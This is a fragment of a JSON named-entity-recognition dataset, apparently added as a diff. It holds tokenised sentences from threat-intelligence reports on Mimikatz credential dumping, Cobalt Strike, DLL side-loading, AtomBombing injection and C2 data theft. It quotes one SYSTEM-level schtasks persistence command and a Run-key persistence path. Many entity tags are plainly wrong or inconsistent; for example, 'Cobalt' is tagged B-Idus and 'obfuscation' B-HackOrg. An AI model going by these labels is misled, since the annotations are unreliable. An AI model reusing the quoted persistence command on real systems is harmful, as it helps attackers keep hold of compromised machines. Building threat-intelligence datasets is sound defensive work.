"adversary", + "uses", + "the", + "command", + "and", + "control", + "channel", + "to", + "exfiltrate", + "small", + "amounts", + "of", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "I-Tool", + "I-Tool", + "O", + "B-SamFile", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "adversary", + "executes", + "Cobalt", + "Strike’s", + "built-in", + "Mimikatz", + "to", + "dump", + "its", + "password", + "hashes." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "We", + "observed", + "the", + "use", + "of", + "Mimikatz", + "on", + "this", + "system", + "and", + "saw", + "the", + "hashes", + "of", + "the", + "logged", + "in", + "domain", + "admin", + "account", + "going" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "actor", + "executes", + "Cobalt", + "Strike’s", + "built-in", + "Mimikatz", + "to", + "dump", + "its", + "credentials", + "or", + "password", + "hash" + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + ",", + "staged", + "on", + "another", + "system", + "of", + "the", + "victim,", + "and", + "from", + "there", + "copied", + "to", + "a", + "OneDrive-account", + "controlled", + "by", + "the", + "adversary." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Files", + "and", + "folders", + "of", + "interest", + "are", + "collected", + "as", + "well", + "and", + "staged", + "for", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "We’ve", + "seen", + "the", + "adversary", + "staging", + "data", + "on", + "a", + "remote", + "system", + "or", + "on", + "the", + "local", + "system." + ], + "ner_tags": [ + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "activity", + "group", + "always", + "uses", + "a", + "renamed", + "version", + "of", + "rar.exe." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "adversary", + "copied", + "those", + "tools", + "over", + "SMB", + "from", + "compromised", + "system", + "to", + "compromised", + "system", + "wherever", + "they", + "needed", + "these", + "tools." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "DLL’s", + "used", + "were", + "side-loaded", + "in", + "memory", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "File", + "deletion" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Use", + "scheduled", + "tasks" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "adversary", + "heavily", + "relies", + "on", + "scheduled", + "tasks", + "for", + "executing", + "a", + "batch-file", + "(.bat)", + "to", + "perform", + "their", + "tasks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "example", + "of", + "the", + "creation", + "of", + "such", + "a", + "scheduled", + "task", + "by", + "the", + "adversary:", + "schtasks", + "/create", + "/ru", + "\"SYSTEM\"", + "/tn", + "\"update\"", + "/tr", + "\"cmd", + "/c", + "c:\\windows\\temp\\update.bat\"", + "/sc", + "once", + "/f", + "/st", + "06:59:00" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "batch", + "files", + "for", + "automation." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch-files", + "appear", + "to", + "be", + "used", + "to", + "load", + "the", + "Cobalt", + "Strike", + "beacon,", + "but", + "also", + "to", + "perform", + "discovery", + "commands", + "on", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executing", + "a", + "batch-file", + "(.bat)", + "to", + "perform", + "their", + "tasks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "They", + "switched", + "to", + "C2", + "encapsulated", + "in", + "HTTPS", + "in", + "Q3", + "2019." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "the", + "adversary", + "achieving", + "credentials", + "access", + "by", + "brute", + "force" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "adversary", + "installs", + "a", + "hackers", + "best", + "friend", + "during", + "the", + "intrusion:", + "Cobalt", + "Strike." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "the", + "adversary", + "also", + "searches", + "for", + "VPN", + "and", + "firewall", + "configs," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-OffAct", + "O" + ] + }, + { + "tokens": [ + "This", + "lures", + "users", + "to", + "double-click", + "the", + "graphic", + "to", + "view", + "the", + "content," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malicious", + "documents", + "that", + "implement", + "this", + "technique", + "require", + "users", + "to", + "double-click", + "a", + "document", + "element." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "capturing", + "screenshots" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "and", + "enumerating", + "files", + "and", + "drives" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "establish", + "persistence", + "by", + "creating", + "a", + "registry", + "key", + "under", + "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", + "only", + "if", + "the", + "victim’s", + "machine", + "name", + "differs." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "include", + "exfiltrating", + "system", + "information" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "implement", + "different", + "obfuscation", + "techniques", + "of", + "varying", + "intensities,", + "for", + "example,", + "simple", + "function", + "name", + "malformation", + "and", + "dynamic", + "string", + "resolution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "B-Tool", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "the", + "obfuscation", + "techniques", + "used" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "using", + "Crypto", + "Obfuscator," + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "malicious", + "dynamic", + "link", + "library", + "(DLL)", + "file", + "that’s", + "eventually", + "side-loaded", + "to", + "the", + "application." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "a", + "side-loading", + "vulnerability", + "that" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "We’ve", + "seen", + "the", + "payload", + "delivered", + "in", + "diverse", + "ways", + "including", + "DLL", + "side-loading," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "abuse", + "legitimate", + "applications", + "vulnerable", + "to", + "DLL", + "side-loading", + "attack." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "DLL", + "Side-Loading" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "A", + "benign,", + "legitimate", + "executable", + "abused", + "to", + "side-load", + "the", + "malicious", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malicious", + "side", + "loaded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WDSyncService.exe", + "executable", + "abused", + "to", + "side-load", + "a", + "malicious", + "DLL" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Side", + "loaded", + "malicious", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "abused", + "to", + "side-load", + "the", + "malicious", + "DLL." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executable", + "abused", + "to", + "side-load", + "malicious", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "DLL", + "Side-Loading" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "DLL", + "Side-Loading" + ], + "ner_tags": [ + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "that", + "is", + "abused", + "to", + "side-load", + "a", + "malicious", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "executable", + "that", + "dropped", + "a", + "legitimate", + "WD", + "Discovery", + "app", + "to", + "side-load", + "the", + "malicious", + "WDLocal.dll" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "side-loads", + "malicious", + "WDLocal.dll", + "The", + "side-loaded", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "side-loading", + "is", + "a", + "highly", + "effective", + "technique", + "for", + "tricking", + "Windows", + "systems", + "into", + "loading", + "malicious", + "code." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversaries", + "use", + "side-loading", + "attacks", + "for", + "execution" + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "executable", + "starts", + "running,", + "it", + "side-loads", + "the", + "malicious", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "lure", + "victims", + "into", + "downloading", + "a", + "malicious", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "designed", + "to", + "steal", + "sensitive", + "information,", + "including", + "login", + "data,", + "cookies,", + "and", + "Facebook", + "ad", + "and", + "business", + "account", + "information." + ], + "ner_tags": [ + "O", + "O", + "I-Purp", + "I-Purp", + "B-Features", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "scripts", + "are", + "encoded", + "using", + "different", + "techniques," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "(base64", + "encoded", + "with", + "string", + "replacements)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "are", + "compressed", + "and", + "encrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Base64", + "encoded", + "string", + "with", + "several", + "string", + "replacements." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "self-written", + "extensions", + "that", + "obfuscate", + "the", + "PHP", + "scripts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "And", + "malicious", + "payloads", + "are", + "also", + "sometimes", + "encrypted/packed", + "or", + "obfuscated" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "with", + "SmartAssembly" + ], + "ner_tags": [ + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "base64", + "encoded", + "with", + "some", + "string", + "modifications" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "downloads", + "the", + "file", + "from", + "its", + "command", + "and", + "control", + "(C2)", + "server," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they’re", + "downloaded", + "from", + "the", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executes,", + "it", + "drops", + "a", + "PHP", + "application", + "with", + "additional", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Download", + "and", + "run" + ], + "ner_tags": [ + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Downloads", + "a", + "file", + "from", + "the", + "given", + "URL", + "and", + "executes", + "it", + "with", + "the", + "given", + "arguments." + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "given", + "task", + "the", + "downloaded", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "new", + "stealer", + "is", + "downloaded", + "and", + "executed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Upload", + "file", + "function" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "then", + "decodes", + "and", + "executes", + "it." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "the", + "main", + "thread", + "the", + "SFX/ZIP", + "file", + "is", + "executed/decompressed," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "that", + "decodes", + "and", + "drops", + "three", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "starts", + "with", + "de-obfuscating", + "the", + "next", + "stage", + "(string", + "replacements", + "+", + "base64", + "decoding)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "decoded,", + "this", + "executable,", + "written", + "in", + "Rust", + "and", + "compiled", + "with", + "Cargo,", + "gets", + "the", + "current", + "date", + "and", + "time,", + "and", + "decrypts", + "Chromium-based", + "browsers’", + "encryption", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "does", + "this", + "by", + "decoding", + "the", + "rss.txt", + "into", + "an", + "executable" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "executable", + "decodes", + "and", + "drops", + "the", + "next", + "stage" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "creates", + "a", + "scheduled", + "task", + "that", + "runs", + "the", + "Rust", + "executable", + "by", + "passing", + "it", + "as", + "an", + "argument", + "to", + "rhc.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "registers", + "a", + "new", + "scheduled", + "task", + "to", + "trigger", + "every", + "day", + "and", + "repeat", + "every", + "hour", + "with", + "option", + "“d”", + "as", + "an", + "argument." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Creates", + "a", + "scheduled", + "task", + "to", + "be", + "executed", + "with", + "d", + "as", + "an", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Responsible", + "for", + "installing", + "persistence", + "via", + "scheduled", + "tasks" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "attacker", + "must", + "know", + "the", + "time", + "to", + "set", + "it", + "in", + "the", + "scheduled", + "task." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "createTS—creates", + "scheduled", + "task.", + "createLG—creates", + "scheduled", + "task", + "at", + "logon" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "creates", + "a", + "scheduled", + "task", + "that", + "executes", + "the", + "updated", + "routine,", + "which", + "triggers", + "at", + "log-on", + "and", + "every", + "30", + "minutes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "registers", + "two", + "scheduled", + "tasks:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "embeds", + "legitimate", + "DLLs", + "using", + "the", + "SmartAssembly", + "feature" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Once", + "the", + "execution", + "completes,", + "the", + "file", + "is", + "deleted", + "to", + "leave", + "no", + "evidence", + "on", + "the", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "file", + "is", + "deleted", + "to", + "remove", + "evidence", + "from", + "the", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "passes", + "this", + "command", + "line", + "as", + "an", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gets", + "a", + "command", + "to", + "run,", + "executes", + "it" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gets", + "command", + "from", + "C2", + "and", + "executes", + "it" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Executable", + "that", + "accepts", + "an", + "executable", + "as", + "an", + "argument", + "and", + "executes", + "it", + "with", + "hidden", + "console" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "“wmic", + "os", + "get", + "LocalDateTime", + "/value”." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "steal", + "the", + "victim’s", + "Facebook", + "information", + "and", + "send", + "it", + "back", + "to", + "the", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Extract", + "victim’s", + "sensitive", + "Facebook", + "data", + "using", + "the", + "graph", + "API", + "and", + "send", + "the", + "results", + "to", + "a", + "C2", + "server" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "can", + "extract", + "this", + "information", + "and", + "send", + "it", + "to", + "its", + "command", + "and", + "control", + "(C2)", + "server" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "API", + "functions." + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "API", + "calls" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "API", + "calls" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "calls", + "point", + "to", + "a", + "suspicious", + "API" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creation", + "functions", + "like", + "NtCreateUserProcess,", + "NtCreateProcessEx,", + "CreateProcessInternalW,", + "CreateProcessA", + "or", + "CreateProcessW." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "an", + "exported", + "function", + "from", + "one", + "of", + "the", + "Windows", + "libraries" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "suspicious", + "APIs", + "often", + "used", + "in", + "code", + "injection", + "techniques", + "like", + "CreateRemoteThread", + "or", + "NtSetContextThread." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "frequently", + "called", + "API", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "critical", + "APIs" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Microsoft", + "Outlook", + "Messaging", + "API", + "(MAPI)", + "module" + ], + "ner_tags": [ + "O", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "process", + "creation", + "library", + "functions" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "calls", + "the", + "NtProtectVirtualMemory", + "function", + "where", + "the", + "NewAccessProtection", + "argument", + "is", + "PAGE_EXECUTE_READWRITE", + "and", + "the", + "BaseAddress", + "argument", + "is", + "an", + "address", + "to", + "a", + "library", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "a", + "variation", + "of", + "AtomBombing", + "that", + "queues", + "an", + "APC", + "to", + "call", + "memset", + "to", + "clean", + "an", + "RW", + "region", + "in", + "ntdll.dll." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "dispatch", + "an", + "asynchronous", + "procedure", + "call", + "(APC)", + "to", + "the", + "APC", + "queue", + "of", + "a", + "target", + "process", + "thread", + "using", + "NtQueueApcThread" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "injector", + "process", + "dispatches", + "another", + "APC", + "using", + "NtQueueApcThread", + "to", + "force", + "the", + "remote", + "process", + "to", + "execute", + "NtSetContextThread." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "queues", + "an", + "APC", + "into", + "the", + "patched", + "GlobalGetAtomA", + "to", + "get", + "the", + "payload", + "running." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APC", + "routine", + "argument", + "in", + "the", + "case", + "of", + "NtQueueApcThread," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "AtomBombing", + "is", + "the", + "write-primitive,", + "which", + "allows", + "writing", + "to", + "the", + "remote", + "process", + "using", + "atom", + "tables", + "and", + "APC." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "AtomBombing", + "Injection", + "Technique" + ], + "ner_tags": [ + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "AtomBombing", + "is", + "a", + "technique", + "that", + "allows", + "malware", + "to", + "inject", + "code", + "while", + "avoiding", + "calling", + "suspicious", + "APIs" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malware", + "using", + "the", + "AtomBombing", + "technique", + "first", + "writes", + "the", + "payload", + "into", + "the", + "global", + "atom", + "table,", + "which", + "can", + "be", + "accessed", + "by", + "all", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "a", + "slightly", + "modified", + "AtomBombing", + "technique", + "that", + "injects", + "one", + "of", + "its", + "stages", + "into", + "a", + "Windows", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "can", + "read", + "HTTP-POST", + "headers" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "the", + "main", + "bot", + "into", + "svchost.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Injected", + "Processes" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Process", + "Injection", + "via", + "Hooking" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "use", + "this", + "technique", + "to", + "inject", + "themselves", + "into", + "other", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "inject", + "their", + "main", + "bot", + "into", + "a", + "Windows", + "process,", + "and", + "then", + "inject", + "their", + "other", + "modules", + "into", + "different", + "processes", + "according", + "to", + "the", + "module’s", + "purpose" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "injection", + "into", + "a", + "web", + "browser", + "process." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injected", + "thread" + ], + 